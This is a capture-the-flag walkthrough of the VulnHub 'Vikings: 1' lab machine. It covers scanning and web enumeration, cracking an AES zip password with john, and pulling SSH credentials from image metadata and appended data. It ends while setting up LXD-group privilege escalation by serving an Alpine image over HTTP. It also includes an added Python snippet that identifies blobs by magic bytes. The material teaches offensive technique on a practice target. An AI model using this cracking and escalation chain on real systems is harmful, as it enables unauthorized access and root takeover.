
VulnHub Vikings: 1 box, a detailed walkthrough

Vikings

Author: jason_huawen

Target basics

Name: Vikings: 1

URL:

https://www.vulnhub.com/entry/vikings-1,741/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ sudo netdiscover -i eth1

Currently scanning: 172.16.137.0/16   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:89:29:07      2     120  PCS Systemtechnik GmbH                                                   
 192.168.56.126  08:00:27:09:9a:d1      1      60  PCS Systemtechnik GmbH    

Using netdiscover (shipped with Kali Linux), the target host's IP address is identified as 192.168.56.126. The .1 and .100 entries belong to the VirtualBox host-only network itself; the target is the remaining VirtualBox NIC.

Nmap scan

First, run a full TCP port scan of the target with Nmap (all 65535 ports, with service version detection and the default script set):

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.126 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-09 00:23 EST
Nmap scan report for bogon (192.168.56.126)
Host is up (0.00036s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 59:d4:c0:fd:62:45:97:83:15:c0:15:b2:ac:25:60:99 (RSA)
|   256 7e:37:f0:11:63:80:15:a3:d3:9d:43:c6:09:be:fb:da (ECDSA)
|_  256 52:e9:4f:71:bc:14:dc:00:34:f2:a7:b3:58:b5:0d:ce (ED25519)
80/tcp open  http    Apache httpd 2.4.29
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2020-10-29 21:07  site/
|_
|_http-title: Index of /
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:09:9A:D1 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.67 seconds

The scan shows two open ports: 22 (SSH, OpenSSH 7.6p1 on Ubuntu) and 80 (HTTP, Apache 2.4.29). Two details are worth noting. The other 65533 ports are reported as filtered rather than closed, so the target runs a host firewall that silently drops unsolicited traffic, which becomes relevant later. And the http-ls script shows that directory listing is enabled on the web root, exposing a site/ directory.

Getting a shell

The SSH service offers nothing to exploit without credentials, so information gathering focuses on the HTTP service:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126                         
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="site/">site/</a></td><td align="right">2020-10-29 21:07  </td><td align="right">  - </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.126 Port 80</address>
</body></html>
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.126 Port 80</address>
</body></html>
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126/site      
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.56.126/site/">here</a>.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.126 Port 80</address>
</body></html>
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126/site/
<!DOCTYPE html>
<!--  This site was created in Webflow. http://www.webflow.com  -->
<!--  Last Published: Fri May 01 2020 14:48:48 GMT+0000 (Coordinated Universal Time)  -->
<html data-wf-page="5ea837e8c81001b668dffd4a" data-wf-site="5ea837e8c8100167b2dffd49">
<head>
  <meta charset="utf-8">
  <title>Split</title>
  <meta content="width=device-width, initial-scale=1" name="viewport">
  <meta content="Webflow" name="generator">
  <link href="css/normalize.css" rel="stylesheet" type="text/css">
  <link href="css/webflow.css" rel="stylesheet" type="text/css">
  <link href="css/split-opl.webflow.css" rel="stylesheet" type="text/css">
  <script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script>
  <script type="text/javascript">WebFont.load({  google: {    families: ["Inter:regular,600","Lora:regular"]  }});</script>
  <!-- [if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js" type="text/javascript"></script><![endif] -->
  <script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);</script>
  <link href="images/favicon.png" rel="shortcut icon" type="image/x-icon">
  <link href="images/webclip.jpg" rel="apple-touch-icon">
  <style type="text/css">
body {
  -webkit-font-smoothing: antialiased;
}      
</style>
</head>
<body class="body">
  <div class="columns w-row">
    <div class="leftcontent w-col w-col-6 w-col-stack">
      <div data-w-id="b84f5156-c6e2-fb1d-6606-98a08030a472" style="opacity:0" class="image"></div>
    </div>
    <div class="rightcontent w-col w-col-6 w-col-stack">
      <div data-w-id="3fd5aeb3-22da-ed60-7286-0d11f16597d3" style="opacity:0" class="content">
        <div class="name">Ivar The Boneless</div>
        <h1 class="tagline"><strong class="bold-text">Mad King</strong></h1>
        <p class="bio">865 the Great Heathen Army, led by Ivar, invaded the Anglo-Saxon Heptarchy.The Heptarchy was the collective name for the seven kingdoms East Anglia, Essex, Kent, Mercia, Northumbria, Sussex and Wessex. The invasion was organised by the sons of Ragnar Lodbrok, to wreak revenge against Ælla of Northumbria who had supposedly executed Ragnar in 865 by throwing him in a snake pit, but the historicity of this explanation is unknown.According to the saga, Ivar did not overcome Ælla and sought reconciliation. He asked for only as much land as he could cover with an ox's hide and swore never to wage war against Ælla. Then Ivar cut the ox's hide into such fine strands that he could envelop a large fortress (in an older saga it was York and according to a younger saga it was London), which he could take as his own. (Compare the similar legendary ploy of Dido.)</p>
        <div class="links w-row">
          <div class="column w-col w-col-4">
            <div class="text-block-2">Connect</div>
            <ul class="list w-list-unstyled">
              <li><a href="#">Blog</a></li>
              <li><a href="#">Email</a></li>
              <li><a href="#">Newsletter</a></li>
            </ul>
          </div>
          <div class="column-2 w-col w-col-4">
            <div class="text-block-2">social</div>
            <ul class="list w-list-unstyled">
              <li><a href="#">Twitter</a></li>
              <li><a href="#">Instagram</a></li>
              <li><a href="#">Dribbble</a></li>
            </ul>
          </div>
          <div class="w-col w-col-4">
            <div class="text-block-2">network</div>
            <ul class="list w-list-unstyled">
              <li><a href="#">Link One</a></li>
              <li><a href="#">Link Two</a></li>
              <li><a href="#">Link Three</a></li>
            </ul>
          </div>
        </div>
        <div class="credit">©2020 Ivar The Boneless</div>
      </div>
    </div>
  </div>
  <script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.4.1.min.220afd743d.js?site=5ea837e8c8100167b2dffd49" type="text/javascript" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script>
  <script src="js/webflow.js" type="text/javascript"></script>
  <!-- [if lte IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/placeholders/3.0.2/placeholders.min.js"></script><![endif] -->
</body>
</html>                                          
                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ nikto -h http://192.168.56.126/site/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.126
+ Target Hostname:    192.168.56.126
+ Target Port:        80
+ Start Time:         2022-12-09 02:56:40 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Server may leak inodes via ETags, header found with file /site/, inode: 1143, size: 5b2d5ac892300, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ OSVDB-3268: /site/css/: Directory indexing found.
+ OSVDB-3092: /site/css/: This might be interesting...
+ OSVDB-3268: /site/images/: Directory indexing found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2022-12-09 02:56:54 (GMT-5) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The /site/images/ directory (listing enabled, as nikto reported) holds three images. Download them locally and check the JPEGs for steganography, first with steghide using an empty passphrase and then with stegseek's wordlist brute force:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ steghide extract -sf split.jpg      
Enter passphrase: 
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ stegseek split.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.22% (132.4 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ steghide extract -sf webclip.jpg 
Enter passphrase: 
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ stegseek webclip.jpg 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.44% (132.7 MB)           
[!] error: Could not find a valid passphrase.
                                                         

These images appear to be a dead end, so next enumerate directories and files on the target:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ gobuster dir -u http://192.168.56.126/site/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.126/site/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/09 03:00:04 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 322] [--> http://192.168.56.126/site/images/]
/css                  (Status: 301) [Size: 319] [--> http://192.168.56.126/site/css/]
/js                   (Status: 301) [Size: 318] [--> http://192.168.56.126/site/js/]
Progress: 218385 / 220561 (99.01%)===============================================================
2022/12/09 03:00:31 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ gobuster dir -u http://192.168.56.126/site/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.126/site/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,txt,html,sh
[+] Timeout:                 10s
===============================================================
2022/12/09 03:00:43 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/images               (Status: 301) [Size: 322] [--> http://192.168.56.126/site/images/]
/index.html           (Status: 200) [Size: 4419]
/css                  (Status: 301) [Size: 319] [--> http://192.168.56.126/site/css/]
/js                   (Status: 301) [Size: 318] [--> http://192.168.56.126/site/js/]
/war.txt              (Status: 200) [Size: 13]
/.html                (Status: 403) [Size: 279]
Progress: 1101000 / 1102805 (99.84%)===============================================================
2022/12/09 03:03:03 Finished
===============================================================

The second run finds /site/war.txt. Note that the first run, without -x, missed it entirely: when brute-forcing a static site, always include file extensions. Fetch the file:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126/site/war.txt
/war-is-over

war.txt names a single path, /war-is-over (relative to /site/). Requesting that directory returns a page whose body is one long encoded string; save it locally:

Oddly, pasting the page content from the browser into vim seemed to get stuck in an endless loop. Instead of copying from the browser, fetch it with curl and redirect the output to a file:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126/site/war-is-over/ > bigtext    

The text looks like base64, so decode it:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ cat bigtext | base64 -d > decoded

cat decoded prints only binary garbage; file identifies it as a zip archive that is AES-encrypted (WinZip's compression method 99) and needs an extractor compatible with zip version 5.1:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ ls                                                                                     
bigtext  decoded  nmap_full_scan  split.jpg  webclip.jpg
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ file decoded 
decoded: Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ mv decoded decoded.zip                                
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ unzip decoded.zip    
Archive:  decoded.zip
   skipping: king                    need PK compat. v5.1 (can do v4.6)
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ ls
bigtext  decoded.zip  nmap_full_scan  split.jpg  webclip.jpg
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ zip2john decoded.zip > zip_hash        
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ ls
bigtext  decoded.zip  nmap_full_scan  split.jpg  webclip.jpg  zip_hash
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 1410760 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ragnarok123      (decoded.zip/king)     
1g 0:00:00:09 DONE (2022-12-09 03:19) 0.1107g/s 33112p/s 33112c/s 33112C/s redsox#1..money66
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                

With the zip password (ragnarok123) in hand, extract decoded.zip. Stock unzip cannot handle WinZip AES entries, which is why it skipped king with "need PK compat. v5.1"; the archive was extracted from the desktop file manager's Extract dialog instead, entering the password when prompted. The 7z command-line tool also handles this format.

The archive contains a single file, king, which is a JPEG image:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ file king   
king: JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=14, height=4000, bps=0, PhotometricIntepretation=RGB, description=Viking ships on the water under the sunlight and dark storm. Invasion in the storm. 3D illustration.; Shutterstock ID 100901071, orientation=upper-left, width=6000], baseline, precision 8, 1600x1067, components 3
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ steghide extract -sf king           
Enter passphrase: 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ stegseek king            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.62% (132.9 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ exiftool king           
ExifTool Version Number         : 12.44
File Name                       : king
Directory                       : .
File Size                       : 1430 kB
File Modification Date/Time     : 2021:09:03 06:30:03-04:00
File Access Date/Time           : 2022:12:09 03:27:07-05:00
File Inode Change Date/Time     : 2022:12:09 03:26:48-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Photometric Interpretation      : RGB
Image Description               : Viking ships on the water under the sunlight and dark storm. Invasion in the storm. 3D illustration.; Shutterstock ID 1009010713
Orientation                     : Horizontal (normal)
Samples Per Pixel               : 3
X Resolution                    : 300
Y Resolution                    : 300
Resolution Unit                 : inches
Software                        : Adobe Photoshop CC 2019 (Windows)
Modify Date                     : 2018:11:26 10:32:02
Artist                          : vlastas
Exif Version                    : 0221
Color Space                     : Uncalibrated
Exif Image Width                : 1600
Exif Image Height               : 1067
Compression                     : JPEG (old-style)
Thumbnail Offset                : 558
Thumbnail Length                : 5613
Current IPTC Digest             : 73f42d7d127f00bdd0e556910f4a85a8
Coded Character Set             : UTF8
Application Record Version      : 4
Caption-Abstract                : Viking ships on the water under the sunlight and dark storm. Invasion in the storm. 3D illustration.; Shutterstock ID 1009010713
By-line                         : vlastas
Object Name                     : 1009010713
Original Transmission Reference : 53616c7465645f5f0f79ebad28071734
Keywords                        : 3d, ancient, attack, battle, boat, culture, dark, denmark, drakkar, dramatic, dusk, engraved, evening, history, illustration, invasion, leadership, longboat, men, nautical, nordic, norse, north, northern, norway, occupation, river, sail, sailboat, scandinavian, shield, ship, storm, stormy, sun, sunbeam, sunlight, sunrise, sunset, vandal, vessel, viking, viking ship, war, warrior, water, weather, wind, windstorm, wooden
IPTC Digest                     : 73f42d7d127f00bdd0e556910f4a85a8
Displayed Units X               : inches
Displayed Units Y               : inches
Print Style                     : Centered
Print Position                  : 0 0
Print Scale                     : 1
Global Angle                    : 30
Global Altitude                 : 30
URL List                        : 
Slices Group Name               : viking021
Num Slices                      : 1
Pixel Aspect Ratio              : 1
Photoshop Thumbnail             : (Binary data 5613 bytes, use -b option to extract)
Has Real Merged Data            : Yes
Writer Name                     : Adobe Photoshop
Reader Name                     : Adobe Photoshop CC 2019
Photoshop Quality               : 12
Photoshop Format                : Standard
Progressive Scans               : 3 Scans
XMP Toolkit                     : Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22
Format                          : image/jpeg
Legacy IPTC Digest              : 250DA4DEC6F34E708125EF03F795F091
Transmission Reference          : 53616c7465645f5f0f79ebad2807173403390e2bb3edd8e2c4479d390bd71e50
Credit                          : Shutterstock / vlastas
Source                          : Shutterstock
Color Mode                      : RGB
ICC Profile Name                : 
Document ID                     : adobe:docid:photoshop:2d821c53-a3ca-e346-80f6-118a95cc9817
Instance ID                     : xmp.iid:5bef0ca9-3ef9-e44f-865c-f39bdc472764
Original Document ID            : A609744630A618A935A1D637005C673F
Create Date                     : 2018:11:26 10:28:18-06:00
Metadata Date                   : 2018:11:26 10:32:02-06:00
Creator Tool                    : Adobe Photoshop CC 2019 (Windows)
Description                     : Viking ships on the water under the sunlight and dark storm. Invasion in the storm. 3D illustration.; Shutterstock ID 1009010713
Title                           : 1009010713
Subject                         : 3d, ancient, attack, battle, boat, culture, dark, denmark, drakkar, dramatic, dusk, engraved, evening, history, illustration, invasion, leadership, longboat, men, nautical, nordic, norse, north, northern, norway, occupation, river, sail, sailboat, scandinavian, shield, ship, storm, stormy, sun, sunbeam, sunlight, sunrise, sunset, vandal, vessel, viking, viking ship, war, warrior, water, weather, wind, windstorm, wooden
Creator                         : vlastas
History Action                  : saved, converted, derived, saved, saved, converted, derived, saved
History Instance ID             : xmp.iid:642d0712-667d-2d43-8e5e-dcde3e7be5bf, xmp.iid:f9584b87-136c-8c43-8d2b-121dfc42e1c3, xmp.iid:f312a9e4-c83e-5046-b32f-7d31285efcc6, xmp.iid:5bef0ca9-3ef9-e44f-865c-f39bdc472764
History When                    : 2018:11:26 10:31:55-06:00, 2018:11:26 10:31:55-06:00, 2018:11:26 10:32:02-06:00, 2018:11:26 10:32:02-06:00
History Software Agent          : Adobe Photoshop CC 2019 (Windows), Adobe Photoshop CC 2019 (Windows), Adobe Photoshop CC 2019 (Windows), Adobe Photoshop CC 2019 (Windows)
History Changed                 : /, /, /, /
History Parameters              : from image/jpeg to image/tiff, converted from image/jpeg to image/tiff, from image/tiff to image/jpeg, converted from image/tiff to image/jpeg
Derived From Instance ID        : xmp.iid:f312a9e4-c83e-5046-b32f-7d31285efcc6
Derived From Document ID        : adobe:docid:photoshop:a311ad0b-1bf9-f446-b96f-1960b71bb9bf
Derived From Original Document ID: A609744630A618A935A1D637005C673F
DCT Encode Version              : 100
APP14 Flags 0                   : [14]
APP14 Flags 1                   : (none)
Color Transform                 : YCbCr
Image Width                     : 1600
Image Height                    : 1067
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 1600x1067
Megapixels                      : 1.7
Thumbnail Image                 : (Binary data 5613 bytes, use -b option to extract)

The Transmission Reference field in the image metadata looks odd: a 64-character hex string. Run it through hash-identifier:

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ hash-identifier 
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   [email protected] #
   #########################################################################
--------------------------------------------------
 HASH: 53616c7465645f5f0f79ebad2807173403390e2bb3edd8e2c4479d390bd71e50

Possible Hashs:
[+] SHA-256
[+] Haval-256

Least Possible Hashs:
[+] GOST R 34.11-94
[+] RipeMD-256
[+] SNEFRU-256
[+] SHA-256(HMAC)
[+] Haval-256(HMAC)
[+] RipeMD-256(HMAC)
[+] SNEFRU-256(HMAC)
[+] SHA-256(md5($pass))
[+] SHA-256(sha1($pass))
--------------------------------------------------
 HASH: ^C

     Bye!
                                    

Attempts to crack this "SHA-256" on online lookup sites all failed. In hindsight this was a detour: the value is 64 hex characters, the length of a SHA-256 digest, but its first eight bytes, 53616c7465645f5f, decode to the ASCII text Salted__, the magic header that openssl enc writes in front of an 8-byte salt (here 0f79ebad28071734) and the ciphertext (the remaining 16 bytes, exactly one cipher block). It is an encrypted blob, not a hash, so no hash lookup could ever match it, and it plays no further role in this walkthrough; the shorter Original Transmission Reference is the same value truncated to 16 bytes. The productive lead is to check the image for data appended after the JPEG with binwalk:
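Both decoding steps above (base64 text that turned out to be an AES zip, and a hex string that turned out to be an OpenSSL blob rather than a hash) come down to reading the leading bytes of the decoded data instead of trusting its length. The following is an added example and not part of the original write-up: it classifies a decoded blob by its magic bytes and, for a zip, reads the "version needed", encryption flag and compression method from the local file header, the same fields file reported for decoded.zip. The hex input is the Transmission Reference value from the page; the zip sample is a constructed 34-byte header built to match the properties of decoded.zip (it is not the real archive).

```python
import base64
import struct

# Value taken from the king image's metadata (Transmission Reference field).
TRANSMISSION_REF_HEX = (
    "53616c7465645f5f0f79ebad2807173403390e2bb3edd8e2c4479d390bd71e50"
)


def sample_aes_zip_header() -> bytes:
    """Constructed sample, NOT the real decoded.zip: a zip local-file header
    with the properties `file` reported (version 5.1, encrypted, WinZip AES)."""
    return struct.pack(
        "<4sHHHHHIIIHH",
        b"PK\x03\x04",  # local file header signature
        51,             # version needed to extract: 51 -> "5.1"
        1,              # general purpose flags: bit 0 = encrypted
        99,             # compression method 99 = AES (WinZip AE-x)
        0, 0,           # modification time, modification date
        0,              # CRC-32 (AES entries may leave it zeroed)
        53, 92,         # compressed / uncompressed size (values from binwalk)
        4, 0,           # file name length, extra field length
    ) + b"king"


def sample_base64_zip() -> str:
    """The constructed header the way it would appear on the war-is-over page."""
    return base64.b64encode(sample_aes_zip_header()).decode()


def classify(blob: bytes) -> dict:
    """Identify decoded data by its magic bytes, not by its length."""
    if blob.startswith(b"PK\x03\x04") and len(blob) >= 30:
        _, version, flags, method = struct.unpack_from("<4sHHH", blob, 0)
        return {
            "kind": "zip",
            "version_needed": f"{version // 10}.{version % 10}",
            "encrypted": bool(flags & 0x1),
            "aes": method == 99,  # stock unzip skips these; 7z handles them
        }
    if blob.startswith(b"\xff\xd8\xff"):
        return {"kind": "jpeg"}
    if blob.startswith(b"Salted__"):
        # Layout written by `openssl enc`: 8-byte magic, 8-byte salt, ciphertext.
        salt, ciphertext = blob[8:16], blob[16:]
        return {
            "kind": "openssl-enc",
            "salt": salt.hex(),
            "ciphertext_len": len(ciphertext),
            "single_block": len(ciphertext) == 16,  # one 16-byte cipher block
        }
    return {"kind": "unknown", "length": len(blob)}


def decode_and_classify(text: str) -> dict:
    """Take the raw text as found on a page (hex or base64) and classify it.
    Hex is tried first because every hex string is also valid base64."""
    text = "".join(text.split())  # drop the newlines curl output may contain
    if len(text) % 2 == 0:
        try:
            return classify(bytes.fromhex(text))
        except ValueError:
            pass
    try:
        return classify(base64.b64decode(text, validate=True))
    except ValueError:
        return {"kind": "undecodable"}


if __name__ == "__main__":
    print(decode_and_classify(TRANSMISSION_REF_HEX))
    print(decode_and_classify(sample_base64_zip()))
```

Run against the page's hex value it reports an openssl-enc blob with salt 0f79ebad28071734 and a single 16-byte ciphertext block; run against the constructed base64 it reports an AES-encrypted zip needing version 5.1, which is the cue to reach for 7z or zip2john rather than unzip.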

┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ binwalk -e king

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, EXIF standard
12            0xC             TIFF image data, big-endian, offset of first image directory: 8
1429567       0x15D03F        Zip archive data, at least v2.0 to extract, compressed size: 53, uncompressed size: 92, name: user
1429740       0x15D0EC        End of Zip archive, footer length: 22

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ ls     
bigtext  decoded.zip  image_hash  king  _king.extracted  nmap_full_scan  split.jpg  webclip.jpg  zip_hash
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ cd _king.extracted 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings/_king.extracted]
└─$ ls
15D03F.zip  user
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings/_king.extracted]
└─$ cat user                 
//FamousBoatbuilder_floki@vikings                                     
//f@m0usboatbuilde7 
                                             

binwalk finds a zip archive appended after the JPEG data and extracts it (-e). The archive holds a file named user with two commented lines: FamousBoatbuilder_floki@vikings and f@m0usboatbuilde7, which read as a username (floki, on host vikings) and a password. Try them over SSH:

┌──(kali㉿kali)-[~/Vulnhub/Vikings/_king.extracted]
└─$ ssh [email protected]        
The authenticity of host '192.168.56.126 (192.168.56.126)' can't be established.
ED25519 key fingerprint is SHA256:volom5GRMcetvgfJsyVTXVnNY0FUA6W1k/5fsdHs9T4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.126' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Dec  9 08:37:30 UTC 2022

  System load:  0.0               Processes:             95
  Usage of /:   53.5% of 8.79GB   Users logged in:       0
  Memory usage: 39%               IP address for enp0s3: 192.168.56.126
  Swap usage:   0%


0 updates can be applied immediately.


You have mail.
Last login: Sat Sep  4 04:38:04 2021 from 10.42.0.1
floki@vikings:~$ id
uid=1000(floki) gid=1000(floki) groups=1000(floki),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)
floki@vikings:~$ 

Privilege escalation

The id output shows that floki is a member of the lxd group (gid 108). That group grants access to the LXD daemon's Unix socket, and the daemon runs as root, so any member can launch a privileged container with the host's filesystem mounted inside it and act on the host as root. We use that to escalate.

The container needs a base image. Build the Alpine image tarball alpine-v3.13-x86_64-20210218_0139.tar.gz with the lxd-alpine-builder project's build-alpine script (a ready-made tarball can also be downloaded), then serve it to the target over HTTP:

┌──(kali㉿kali)-[~/Vulnhub/Vikings/lxd-alpine-builder]
└─$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz  build-alpine  LICENSE  README.md
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Vikings/lxd-alpine-builder]
└─$ python -m http.server 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

